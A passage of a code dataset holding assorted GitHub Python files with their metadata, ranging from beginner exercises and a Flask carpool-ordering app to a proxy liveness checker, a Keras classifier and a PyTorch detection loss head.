works\nbutton_check=Button(text=\"see variable\", command=checking_for_input,padx=15 )\ninput_box.grid(row=0, column=0)\noutput_box.grid(row=0, column=1)\nbutton_check.grid(row=1, column=1)\n\n\nroot.mainloop()\n","repo_name":"defPyMe/numeric_to_description_hs_codes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"43282945938","text":"import math\ndef f(x1, y1, x2, y2):\n    return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n    \nn = int(input())\na = [list(map(int,input().split())) for i in range(n)]\n\n# largest pairwise distance between any two points\nmax_dist = 0\n\nfor i in a:\n    for j in a:\n        d = f(*i, *j)\n        if max_dist < d:\n            max_dist = d\nprint(max_dist)","repo_name":"kanadomekei/at.coder","sub_path":"at.coder_beginner_contest/b234.py","file_name":"b234.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23263476469","text":"#!/usr/bin/env python3\n\n\"\"\"Command line shareclip client.\n\nWill allow posting from args, post from clipboard, copy to clipboard,\ndelete, undo delete, shutdown, etc.\"\"\"\n\nimport asyncio\n\nimport aiohttp\nimport async_timeout\n\n\nasync def fetch(session, url):\n\t\"\"\"Pull a single URL.\"\"\"\n\twith async_timeout.timeout(10):\n\t\tasync with session.get(url) as response:\n\t\t\treturn await response.text()\n\n\nasync def main():\n\t\"\"\"Command line entry point.\"\"\"\n\tasync with aiohttp.ClientSession() as session:\n\t\thtml = await fetch(session, 'http://localhost:8080')\n\t\tprint(html)\n\n\nif __name__ == '__main__':\n\tloop = asyncio.get_event_loop()\n\tloop.run_until_complete(main())\n","repo_name":"mjem/shareclip","sub_path":"shareclip/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71046134569","text":"#!/usr/bin/env python3\n\nwith open('/home/kami/Projetos/Cod3r/Manipulação_Arquivo/pessoas.csv') as arquivo:\n    #the \"with\" statement opens the file, and \"as\" works like defining a variable; here it was named arquivo\n    #the block's resource is guaranteed to be closed automatically, no need to ask for it to be closed\n    for registro in arquivo:\n        print('Nome: {}, Idade: {}'.format(*registro.strip().split(',')))\n        \nif arquivo.closed:\n    print('Arquivo ja foi fechado')\n    ","repo_name":"kamibarreto/Cod3r","sub_path":"Manipulação_Arquivo/io_5.py","file_name":"io_5.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10499859495","text":"#recursion\r\n#function calling itself\r\n#recursive\r\n#curve writting\r\n#function of statements recursion\r\n#block:\r\n#if while for write is block of ststement\r\n#funtion call again and again\r\n#when function true only that time its runngaian again\r\n#conditions:\r\n#function must use\r\n#not use looping condition\r\n#if staement use for stop recursion \r\n\r\n'''example 1:\r\ndef getusernamepassword(username, password):\r\n if username != 'abc':\r\n print(\"incorrect username\")\r\n username=input(\"enter the username\")\r\n password=input(\"enter the password\")\r\n getusernamepassword(username, password)\r\n elif password != 'abc':\r\n print(\"incorrect password\")\r\n username=input(\"enter the username\")\r\n password=input(\"enter the password\")\r\n getusernamepassword(username, password)\r\n\r\nusername=input(\"enter the username\")\r\npassword=input(\"enter the password\")\r\ngetusernamepassword(username, password)\r\n\r\n#example 2:\r\ndef additions(b):\r\n print(b)\r\n b+=1\r\n if b<=10:\r\n additions(b)\r\n\r\nadditions(1)\r\n\r\n#addtion of digits\r\n#factorial\r\n#GcD\r\n#LcM\r\n#fibbonacci\r\n\r\n#example3:\r\n\r\nfact=1\r\nfor i in range(1,6):\r\n fact=fact*i\r\n print(fact)\r\n\r\ndef fact(num):\r\n if num==1:\r\n return 1\r\n else:\r\n return num * fact(num-1)\r\nresult=fact(7)\r\nprint(result)'''\r\n\r\n#example3:\r\n#sum of digits\r\n\r\ndef sumofdiguts(number):\r\n if number==0:\r\n return 0\r\n else:\r\n rem=number%10\r\n no=number/10\r\n total=rem +sumofdiguts(no)\r\n return total\r\nresult=sumofdiguts(1543) \r\nprint(result)\r\n\r\nprint(__name__)\r\n\r\n#need to use recussion\r\n\r\n#palindrome\r\n#armstrong\r\n#reverse a string\r\n#reverse a sentence\r\n","repo_name":"kasiprabu/PythonCore","sub_path":"recurion.py","file_name":"recurion.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26668115252","text":"from os.path import isfile\nfrom scipy.io import loadmat, savemat\nfrom sklearn.preprocessing import Normalizer\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, BatchNormalization, Dropout\nfrom keras.optimizers import Adam\n\n\ndef load_data():\n if not isfile('features_training.mat') or not isfile('labels_training.mat'):\n raise Exception('\"features_training.mat\" and \"labels_training.mat\" not found in the current path.')\n print('Loading features_training.mat...')\n features = loadmat('features_training.mat')['features']\n features = Normalizer().fit_transform(features) # row normalization: ||x(i)|| = 1\n print('Loading labels_training.mat...')\n labels = loadmat('labels_training.mat')['labels'] > 0 # {-1,1} -> {0,1}\n return features, labels\n\n\ndef build_model():\n model = Sequential()\n # model.add(BatchNormalization(name='bn0')) # column normalization\n # hidden layer 1\n model.add(Dense(1000, input_dim=2000, kernel_initializer='he_normal', name='l1'))\n model.add(BatchNormalization(name='bn1'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n # hidden layer 2\n model.add(Dense(1000, kernel_initializer='he_normal', name='l2'))\n model.add(BatchNormalization(name='bn2'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n # hidden layer 3\n model.add(Dense(500, kernel_initializer='he_normal', name='l3'))\n model.add(BatchNormalization(name='bn3'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n # output layer\n model.add(Dense(1, 
kernel_initializer='glorot_normal', name='l4'))\n    model.add(Activation('sigmoid'))\n\n    model.compile(optimizer=Adam(lr=0.001, decay=0.01, amsgrad=True),\n                  loss='binary_crossentropy',\n                  metrics=['accuracy'])\n    return model\n\n\ndef save_params():\n    p = {'epsilon': 0.001}  # batch normalization epsilon\n    for i in range(1, 4):  # batch normalization parameters\n        p[f'gamma{i}'], p[f'beta{i}'], p[f'mean{i}'], p[f'std{i}'] = model.get_layer(f'bn{i}').get_weights()\n    for i in range(1, 5):  # weights and biases\n        p[f'W{i}'], p[f'b{i}'] = model.get_layer(f'l{i}').get_weights()\n    savemat('model.mat', p)\n\n\nif __name__ == '__main__':\n    model = build_model()\n    X, Y = load_data()\n    model.fit(X, Y, validation_split=0.1, epochs=10, batch_size=256)\n    save_params()\n","repo_name":"SichaoYang/W2MHS","sub_path":"training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"18773277290","text":"#!/usr/bin/env python\n\n\"\"\"\n\n\"\"\"\n\n__author__ = \"MU Mengyuan\"\n\nimport os\nimport sys\nimport glob\nimport pandas as pd\nimport numpy as np\nimport netCDF4 as nc\nimport datetime\nfrom scipy.interpolate import interp1d\nfrom scipy.interpolate import griddata\n\ndef main(fname_lis,fname_hess,loc_lat_lis,loc_lon_lis):\n\n    lis = nc.Dataset(fname_lis, \"r\")\n    hess = nc.Dataset(fname_hess, \"r\")\n\n\n    para = pd.DataFrame([lis.variables['Soiltype_inst'][0,loc_lat_lis,loc_lon_lis],\n                        hess.variables['isoil'][0,0]],\n                        columns=['Soiltype'])\n\n    para['sand'] = [lis.variables['SandFrac_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['sand'][0,0]]\n    para['silt'] = [lis.variables['SiltFrac_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['silt'][0,0]]\n    para['clay'] = [lis.variables['ClayFrac_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['clay'][0,0]]\n    para['ssat'] = [lis.variables['Porosity_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['ssat'][0,0]]\n    para['bch'] = [lis.variables['bch_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['bch'][0,0]]\n    para['sfc'] = [lis.variables['sfc_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['sfc'][0,0]]\n    para['swilt']= [lis.variables['swilt_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['swilt'][0,0]]\n    para['hyds'] = [lis.variables['hyds_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['hyds'][0,0]]\n    para['sucs'] = [lis.variables['sucs_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['sucs'][0,0]]\n    para['css'] = [lis.variables['css_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['css'][0,0]]\n    para['rhosoil'] = [lis.variables['rhosoil_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['rhosoil'][0,0]]\n    para['elev'] = [lis.variables['Elevation_inst'][0,loc_lat_lis,loc_lon_lis],\n                    hess.variables['elev'][0,0]]\n\n    hess.close()\n    lis.close()\n\n    para.to_csv(\"./csv/soil_parameters.csv\")\n\n\nif __name__ == \"__main__\":\n\n\n    # lat_-355_lon_1495\n    loc_lat = 54 # -35.5\n    loc_lon = 149 # 149\n    loc_lat_lis = 40\n    loc_lon_lis = 140\n\n    fname_hess = \"/g/data/w35/mm3972/model/cable/runs/my_version/run_Princeton_single_pixel/ctl/outputs/lat_-355_lon_1495_grass/cable_out_2008.nc\"\n    fname_lis = \"/g/data/w35/mm3972/model/wrf/NUWRF/LISWRF_configs/Princeton_ctl_para/LIS_output/LIS.CABLE.2008020100.d01.nc\"\n\n    
main(fname_lis,fname_hess,loc_lat_lis,loc_lon_lis)\n","repo_name":"bibivking/pixel_met","sub_path":"compare_soil_parameters.py","file_name":"compare_soil_parameters.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69867384490","text":"import requests\r\nimport threading\r\nfrom server.proxy import *\r\n\r\nTEST_URLS = [\r\n    \"http://ifconfig.me/\"\r\n]\r\n\r\n\r\nclass ValidateHTTPProxies:\r\n    def __init__(self, file, out_name='', threads=20):\r\n        self.threads = threads\r\n        self.proxy_file = file\r\n        self.proxy_file_name = self.proxy_file.name\r\n        self.out_proxy_file_name = f\"alive_{self.proxy_file_name}\" if out_name == '' else out_name\r\n        self.proxies = Proxies(self.proxy_file).proxy_list\r\n        self.alive_proxies = self.Test_Proxies(self.proxies)\r\n        self.Save_Alive()\r\n    \r\n    def Test_Proxies(self, proxies):\r\n        thread_array = []\r\n        retval = [None for i in range(len(proxies))]\r\n        for j in range(0, len(proxies), self.threads):\r\n            for i in range(self.threads):\r\n                # guard against the last chunk being smaller than self.threads\r\n                if j + i >= len(proxies):\r\n                    break\r\n                thread = threading.Thread(target=self.Test_Proxy, args=(proxies[j+i], retval, j+i))\r\n                thread.start()\r\n                thread_array.append(thread)\r\n        \r\n        for thread in thread_array:\r\n            thread.join()\r\n        \r\n        return [alive for alive in retval if alive]\r\n\r\n    def Test_Proxy(self, prox, return_val, i):\r\n        url = TEST_URLS[0]\r\n        proxy = prox.Proxy_To_dict()\r\n        try:\r\n            r = requests.get(url, proxies=proxy, timeout=1).text.replace('\\n','')\r\n            if prox.ip == r:\r\n                print(prox.ip, r)\r\n                return_val[i] = prox\r\n            else:\r\n                return_val[i] = False \r\n        except Exception as e:\r\n            return_val[i] = False\r\n\r\n    def Save_Alive(self, filename=\"data/alive_proxy_list.txt\"):\r\n        file = open(filename, 'w')\r\n        proxy_list_string = \"\"\r\n        for proxy in self.alive_proxies:\r\n            proxy_list_string += f\"{proxy.scheme}://{proxy.ip}:{proxy.port}\\n\"\r\n        \r\n        file.write(proxy_list_string)\r\n        file.close()","repo_name":"xl00t/ProxyROT","sub_path":"validate/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10181678181","text":"import json\nfrom datetime import time, datetime\nfrom redshifter import build_and_send_query\n\ndef handler(event, context):\n\n    # GET THE UPLOADED FILE'S NAME\n    uploaded_filename = event['Records'][0]['s3']['object']['key']\n\n    # GET THE UPLOADED FILE'S CATEGORY TYPE\n    file_category = uploaded_filename.split('_')[0][:-1]\n\n    # GET THE FILE'S LWM\n    lwm = uploaded_filename.split('_')[1][:8]\n\n    # GET THE FILE'S HWM\n    hwm = uploaded_filename.split('_')[2][:8]\n\n    # ARRIVAL TIME\n    timestamp = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n    print(type(file_category))\n\n    # BUILD AND SEND QUERY TO REDSHIFT CLUSTER\n    build_and_send_query(file_category, uploaded_filename, lwm, hwm, timestamp)\n","repo_name":"peterbarla/data_etl_aws","sub_path":"serverless-lambda/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6069399855","text":"import pygame\n\nfrom game import GREEN, GREY, YELLOW\n\n\nclass Speedway(pygame.sprite.Sprite):\n    position = True\n\n    def __init__(self, width, height):\n        super().__init__()\n\n#        self.image = pygame.Surface([width, height])\n        \n#        self.image.fill(GREY)\n#        self.image.set_colorkey(GREY)\n        \n        self.image = 
pygame.image.load('black-car.png').convert_alpha()\n        pygame.draw.rect(self.image, GREEN, [0, 0, width*0.1, height])\n        pygame.draw.rect(self.image, GREEN, [width*0.9, 0, width, height])\n        pygame.draw.rect(self.image, YELLOW, [width*0.48, 0, width*0.04, height])\n        self.rect = self.image.get_rect()\n        \n","repo_name":"CCSERIGNE/Game_PYRACY","sub_path":"speedway.py","file_name":"speedway.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11837335627","text":"# -*- coding: utf-8 -*-#\n# -------------------------------------------------------------------------------\n# Name: search_order\n# Date: 2019/4/10\n# -------------------------------------------------------------------------------\nfrom datetime import datetime\n\nfrom flask import render_template, request, redirect, url_for\nfrom flask_login import current_user, login_required\nfrom sqlalchemy import null\n\nfrom app.data.order import MyOrder, SearchOrder, SearchOrderWithTotalCM\nfrom app.data.ticket import SearchTicket\nfrom app.forms.search_order import SearchForm, OrderForm, OrderDriverForm, SearchDriverForm\nfrom app.forms.auth import AddOrderForm,AddFeedbackForm\nfrom app.models.base import db\nfrom app.models.driver import Driver\nfrom app.models.order import Order\nfrom app.models.feedback import feedback\nfrom . import web\n\n\n@web.route('/search', methods=['GET', 'POST'])\ndef search():\n    form = SearchForm(request.form)\n    if request.method == 'POST':  # and form.validate():\n        # print(\"\\n \\n \\n\",form.depart_date.data,\"\\n \\n \\n\")\n        tickets = Order.query.filter_by(depart_date=str(form.depart_date.data),\n                                        o_staddr=form.depart_city.data, o_daddr=form.arrive_city.data).all()\n        tickets = SearchOrder(tickets).orders  # a list of dicts\n        return render_template('web/SearchResults.html', tickets=tickets, form=form)\n\n    # form.single_double.default = '往返s'\n    form.process()\n    return render_template('web/SearchResults.html', form=form, tickets=[])\n\n\n@web.route('/order/<plain_id>')\n@login_required\ndef order(plain_id):\n    \"\"\"\n    :param plain_id: represents the flight name (name); needs to be returned by the front end.\n    :return:\n    \"\"\"\n    order_id = plain_id# 'P' + datetime.now().strftime('%Y%m%d%H%M%S')\n    form = OrderForm(request.form)\n    ticket = Order.query.filter_by(id=plain_id).first()\n\n    form.order_id.default = order_id\n    form.route.default = ticket.o_staddr + '-' + ticket.o_daddr\n    form.depart_time.default = ticket.depart_date + '-' + ticket.depart_time\n    form.process()\n    return render_template('web/OrderInfo.html', form=form)\n\n\n@web.route('/order/save_order', methods=['POST'])\n@login_required\ndef save_order():\n    form = OrderForm(request.form)\n    if request.method == 'POST':  # and form.validate():\n        '''\n        with db.auto_commit():\n            order = Order()\n            order.set_attrs(form.data)\n            # userid = current_user.id, user = get_user(userid)\n            order.user_id = current_user.id\n            order.status = '正在处理'\n\n            db.session.add(order)\n        '''\n        user_id = current_user.id\n        print(form.data)\n        order=Order.query.filter_by(id=form.data['order_id']).first()\n        print(\"\\n order\\n \\n\",order.user_id5)\n        user_num=0\n        if(order.user_id6 is not None):\n            user_num=6\n        elif(order.user_id5 is not None):\n            user_num=5\n        elif(order.user_id4 is not None):\n            user_num=4\n        elif(order.user_id3 is not None):\n            user_num=3\n        elif(order.user_id2 is not None):\n            user_num=2\n        elif(order.user_id1 is not None):\n            user_num=1\n        print(user_num)\n        order.change_info(user_id,user_num)\n    return 
redirect(url_for('web.my_order'))\n\n\n@web.route('/order/my')\n@login_required\ndef my_order():\n    user_id = current_user.id\n    order=list() \n    order.extend(Order.query.filter_by(user_id1=user_id).all())\n    order.extend(Order.query.filter_by(user_id2=user_id).all())\n    order.extend(Order.query.filter_by(user_id3=user_id).all())\n    order.extend(Order.query.filter_by(user_id4=user_id).all())\n    order.extend(Order.query.filter_by(user_id5=user_id).all())\n    order.extend(Order.query.filter_by(user_id6=user_id).all())\n    print(order)\n    my_order = SearchOrder(order,user_id).orders\n    return render_template('web/MyOrder.html', my_order=my_order)\n\n@web.route('/accept_order/<driver_id>', methods=['GET','POST'])\ndef accept_order(driver_id):\n    form = SearchForm(request.form)\n    if request.method == 'POST':  # and form.validate():\n        print(\"\\n \\n \\n\",form.depart_date.data,\"\\n \\n \\n\")\n        tickets = Order.query.filter_by(driver_id=None, depart_date=str(form.depart_date.data),\n                                        o_staddr=form.depart_city.data, o_daddr=form.arrive_city.data).all()\n        tickets = SearchOrder(tickets).orders  # a list of dicts\n        return render_template('web/SearchResults_driver.html', tickets=tickets, form=form, driver_id=driver_id)\n\n    # form.single_double.default = '往返s'\n    form.process()\n    return render_template('web/SearchResults_driver.html', form=form, tickets=[],driver_id=driver_id)\n\n@web.route('/order_submit/<plain_id>')\n@login_required\ndef order_submit(plain_id):\n    \"\"\"\n    :param plain_id: represents the flight name (name); needs to be returned by the front end.\n    :return:\n    \"\"\"\n    order_id = plain_id# 'P' + datetime.now().strftime('%Y%m%d%H%M%S')\n    form = OrderDriverForm(request.form)\n    ticket = Order.query.filter_by(id=plain_id).first()\n\n    form.order_id.default = order_id\n    form.route.default = ticket.o_staddr + '-' + ticket.o_daddr\n    form.depart_time.default = ticket.depart_date + '-' + ticket.depart_time\n    form.process()\n    return render_template('web/OrderDriverInfo.html', form=form,plain_id=plain_id)\n\n@web.route('/order/save_order_driver/<driver_id>', methods=['GET','POST'])\ndef save_order_driver(driver_id):\n    form = OrderDriverForm(request.form)\n    if request.method == 'POST':  # and form.validate():\n        '''\n        with db.auto_commit():\n            order = Order()\n            order.set_attrs(form.data)\n            # userid = current_user.id, user = get_user(userid)\n            order.user_id = current_user.id\n            order.status = '正在处理'\n\n            db.session.add(order)\n        '''\n        print(form.data)\n        order=Order.query.filter_by(id=form.data['order_id']).first()\n        order.change_info_driver(driver_id,form.data['price'])\n        return redirect(url_for('web.my_order_driver',driver_id=driver_id))\n\n@web.route('/driver_order/<driver_id>')\ndef my_order_driver(driver_id): \n    order=Order.query.filter_by(driver_id=driver_id).all()\n    my_order = SearchOrder(order).orders\n    return render_template('web/MyOrderDriver.html', driver_id=driver_id,my_order=my_order)\n\n# add a carpool order\n@web.route('/add_order', methods=['GET', 'POST'])\n@login_required\ndef add_order():\n    form = AddOrderForm(request.form)\n    if request.method == 'POST':  # and form.validate():\n        with db.auto_commit():\n            ticket = Order()\n            ticket.set_attrs(form.data)\n            ticket.user_id1=current_user.id\n            ticket.o_finish=False\n            ticket.o_take=False\n            db.session.add(ticket)\n        return redirect(url_for('web.my_order'))\n    return render_template('web/OrderAdd.html', form=form)\n\n# add feedback\n@web.route('/add_feedback/<order_id>', methods=['GET', 'POST'])\n@login_required\ndef add_feedback(order_id):\n    form = AddFeedbackForm(request.form)\n    ticket = Order.query.filter_by(id=order_id).first()\n    form.order_id.default = order_id\n    form.route.default = 
ticket.o_staddr + '-' + ticket.o_daddr\n    form.depart_time.default = ticket.depart_date + '-' + ticket.depart_time\n    print(form.order_id)\n    form.process()\n    if request.method == 'POST':  # and form.validate():\n        with db.auto_commit():\n            print(feedback.query.filter_by(u_id=current_user.id,o_id=order_id).first())\n            if(feedback.query.filter_by(u_id=current_user.id,o_id=order_id).first() is None):\n                print('none')\n                feedback_ = feedback()\n                feedback_.o_id=order_id\n                feedback_.u_id=current_user.id\n                feedback_.content=request.form.get('content')\n                db.session.add(feedback_)\n        return redirect(url_for('web.my_order'))\n    return render_template('web/AddFeedback.html', form=form)\n\n@web.route('/order_driver_detail/<driver_id>/<order_id>')\ndef order_driver_detail(driver_id,order_id):\n    order=Order.query.filter_by(id=order_id).all()\n    my_order = SearchOrderWithTotalCM(order).orders\n    return render_template('web/MyOrderDriverDetail.html', driver_id=driver_id, my_order=my_order)\n\n@web.route('/search_driver_detail',methods=['GET', 'POST'])\ndef search_driver_detail():\n    my_order=[]\n    form=SearchDriverForm(request.form)\n    if request.method == 'POST':\n        driver_id=Driver.query.filter_by(d_name=form.driver_name.data).first().id\n        order=Order.query.filter_by(driver_id=driver_id).all()\n        my_order = SearchOrderWithTotalCM(order).orders\n    form.process()\n    return render_template('web/SearchOrderDriverDetail.html', form=form,my_order=my_order)","repo_name":"LIU-YUXI/Campus-carpool-platform","sub_path":"app/web/search_order.py","file_name":"search_order.py","file_ext":"py","file_size_in_byte":8830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30420493047","text":"import copy\nimport enum\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.init import kaiming_normal_\nfrom ..model_utils import model_nms_utils\nfrom ..model_utils import centernet_utils\nfrom ...utils import loss_utils\n\nclass Heatmap_Similarity_Loss_Head(nn.Module):\n    def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range, voxel_size,\n                 sequence_length):\n        super().__init__()\n        self.model_cfg = model_cfg\n        self.module_category = self.model_cfg.MODULE_CATEGORY\n        self.num_class = num_class\n        self.grid_size = grid_size\n        self.point_cloud_range = point_cloud_range\n        self.voxel_size = voxel_size\n        self.feature_map_stride = self.model_cfg.TARGET_ASSIGNER_CONFIG.get('FEATURE_MAP_STRIDE', None)\n\n        self.class_names = class_names\n        self.class_names_each_head = []\n        self.class_id_mapping_each_head = []\n\n        for cur_class_names in self.model_cfg.CLASS_NAMES_EACH_HEAD:\n            self.class_names_each_head.append([x for x in cur_class_names if x in class_names])\n            cur_class_id_mapping = torch.from_numpy(np.array(\n                [self.class_names.index(x) for x in cur_class_names if x in class_names]\n            )).cuda()\n            self.class_id_mapping_each_head.append(cur_class_id_mapping)\n\n        total_classes = sum([len(x) for x in self.class_names_each_head])\n        assert total_classes == len(self.class_names), f'class_names_each_head={self.class_names_each_head}'\n\n        self.embedding_network = nn.Sequential(\n            nn.Conv2d(\n                input_channels, self.model_cfg.EMBEDDING_OUTPUT_CHANNEL, 1, stride=1, padding=0, bias=False),\n            nn.BatchNorm2d(self.model_cfg.EMBEDDING_OUTPUT_CHANNEL),\n            nn.ReLU(),\n        )\n        \n        for module in self.embedding_network.modules():\n            if isinstance(module, nn.Conv2d):\n                kaiming_normal_(module.weight.data) \n\n        self.num_class = self.model_cfg.NUM_TOTAL_CLASS\n        
self.seq_length = sequence_length\n\n def assign_target_of_single_head(\n self, num_classes, gt_boxes, feature_map_size, feature_map_stride, num_max_objs=500,\n gaussian_overlap=0.1, min_radius=2\n ):\n \"\"\"\n Args:\n gt_boxes: (N, 8)\n feature_map_size: (2), [x, y]\n\n Returns:\n\n \"\"\"\n heatmap = gt_boxes.new_zeros(num_classes, feature_map_size[1], feature_map_size[0])\n ret_boxes = gt_boxes.new_zeros((num_max_objs, gt_boxes.shape[-1] - 1 + 1))\n inds = gt_boxes.new_zeros(num_max_objs).long()\n mask = gt_boxes.new_zeros(num_max_objs).long()\n\n x, y, z = gt_boxes[:, 0], gt_boxes[:, 1], gt_boxes[:, 2]\n coord_x = (x - self.point_cloud_range[0]) / self.voxel_size[0] / feature_map_stride\n coord_y = (y - self.point_cloud_range[1]) / self.voxel_size[1] / feature_map_stride\n coord_x = torch.clamp(coord_x, min=0, max=feature_map_size[0] - 0.5) # bugfixed: 1e-6 does not work for center.int()\n coord_y = torch.clamp(coord_y, min=0, max=feature_map_size[1] - 0.5) #\n center = torch.cat((coord_x[:, None], coord_y[:, None]), dim=-1)\n center_int = center.int()\n center_int_float = center_int.float()\n\n dx, dy, dz = gt_boxes[:, 3], gt_boxes[:, 4], gt_boxes[:, 5]\n dx = dx / self.voxel_size[0] / feature_map_stride\n dy = dy / self.voxel_size[1] / feature_map_stride\n\n radius = centernet_utils.gaussian_radius(dx, dy, min_overlap=gaussian_overlap)\n radius = torch.clamp_min(radius.int(), min=min_radius)\n\n for k in range(min(num_max_objs, gt_boxes.shape[0])):\n if dx[k] <= 0 or dy[k] <= 0:\n continue\n\n if not (0 <= center_int[k][0] <= feature_map_size[0] and 0 <= center_int[k][1] <= feature_map_size[1]):\n continue\n\n cur_class_id = (gt_boxes[k, -1] - 1).long()\n centernet_utils.draw_gaussian_to_heatmap(heatmap[cur_class_id], center[k], radius[k].item())\n\n inds[k] = center_int[k, 1] * feature_map_size[0] + center_int[k, 0]\n mask[k] = 1\n\n ret_boxes[k, 0:2] = center[k] - center_int_float[k].float()\n ret_boxes[k, 2] = z[k]\n ret_boxes[k, 3:6] = gt_boxes[k, 3:6].log()\n ret_boxes[k, 6] = torch.cos(gt_boxes[k, 6])\n ret_boxes[k, 7] = torch.sin(gt_boxes[k, 6])\n if gt_boxes.shape[1] > 8:\n ret_boxes[k, 8:] = gt_boxes[k, 7:-1]\n\n return heatmap, ret_boxes, inds, mask\n\n def assign_targets(self, gt_boxes, feature_map_size=None, **kwargs):\n \"\"\"\n Args:\n gt_boxes: (B, M, 8)\n range_image_polar: (B, 3, H, W)\n feature_map_size: (2) [H, W]\n spatial_cartesian: (B, 4, H, W)\n Returns:\n\n \"\"\"\n feature_map_size = feature_map_size[::-1] # [H, W] ==> [x, y]\n target_assigner_cfg = self.model_cfg.TARGET_ASSIGNER_CONFIG\n # feature_map_size = self.grid_size[:2] // target_assigner_cfg.FEATURE_MAP_STRIDE\n\n batch_size = gt_boxes.shape[0]\n ret_dict = {\n 'heatmaps': [],\n 'target_boxes': [],\n 'inds': [],\n 'masks': [],\n 'heatmap_masks': []\n }\n\n all_names = np.array(['bg', *self.class_names])\n for idx, cur_class_names in enumerate(self.class_names_each_head):\n heatmap_list, target_boxes_list, inds_list, masks_list = [], [], [], []\n for bs_idx in range(batch_size):\n cur_gt_boxes = gt_boxes[bs_idx]\n gt_class_names = all_names[cur_gt_boxes[:, -1].cpu().long().numpy()]\n\n gt_boxes_single_head = []\n\n for idx, name in enumerate(gt_class_names):\n if name not in cur_class_names:\n continue\n temp_box = cur_gt_boxes[idx]\n temp_box[-1] = cur_class_names.index(name) + 1\n gt_boxes_single_head.append(temp_box[None, :])\n\n if len(gt_boxes_single_head) == 0:\n gt_boxes_single_head = cur_gt_boxes[:0, :]\n else:\n gt_boxes_single_head = torch.cat(gt_boxes_single_head, dim=0)\n\n heatmap, 
ret_boxes, inds, mask = self.assign_target_of_single_head(\n num_classes=len(cur_class_names), gt_boxes=gt_boxes_single_head.cpu(),\n feature_map_size=feature_map_size, feature_map_stride=target_assigner_cfg.FEATURE_MAP_STRIDE,\n num_max_objs=target_assigner_cfg.NUM_MAX_OBJS,\n gaussian_overlap=target_assigner_cfg.GAUSSIAN_OVERLAP,\n min_radius=target_assigner_cfg.MIN_RADIUS,\n )\n heatmap_list.append(heatmap.to(gt_boxes_single_head.device))\n target_boxes_list.append(ret_boxes.to(gt_boxes_single_head.device))\n inds_list.append(inds.to(gt_boxes_single_head.device))\n masks_list.append(mask.to(gt_boxes_single_head.device))\n\n ret_dict['heatmaps'].append(torch.stack(heatmap_list, dim=0))\n ret_dict['target_boxes'].append(torch.stack(target_boxes_list, dim=0))\n ret_dict['inds'].append(torch.stack(inds_list, dim=0))\n ret_dict['masks'].append(torch.stack(masks_list, dim=0))\n return ret_dict\n\n def sigmoid(self, x):\n y = torch.clamp(x.sigmoid(), min=1e-4, max=1 - 1e-4)\n return y\n\n def heatmap_similarity_loss_per_single_head(self, L2_dist_ret, heatmap):\n \"\"\"\n Args:\n pred: (batch x c x h x w)\n gt: (batch x c x h x w)\n mask: (batch x h x w)\n Returns:\n \"\"\"\n num_loc = heatmap.gt(0).float().sum()\n if num_loc == 0:\n return 0\n else:\n heatmap_sim_loss = L2_dist_ret * heatmap\n heatmap_sim_loss = heatmap_sim_loss.sum()\n return (heatmap_sim_loss / num_loc)\n\n \n\n def get_loss(self, embed_features_2d_list: list, heatmap_ref_dict: dict):\n loss = 0\n L2_dist_ret_list = []\n\n batch, C, H, W = embed_features_2d_list[-1].size()\n zero_vector = torch.zeros(batch, 1, C).to(embed_features_2d_list[-1].device)\n\n for t in range(self.seq_length-1):\n support_feature_norm_out = F.normalize(embed_features_2d_list[t], dim=1)\n ref_feature_norm_out = F.normalize(embed_features_2d_list[-1], dim=1)\n residual = (ref_feature_norm_out-support_feature_norm_out).view(batch,C,-1).transpose(1,2)\n # residual = (embed_features_2d_list[-1]-embed_features_2d_list[t]).view(batch,C,-1).transpose(1,2)\n dist = torch.cdist(residual, 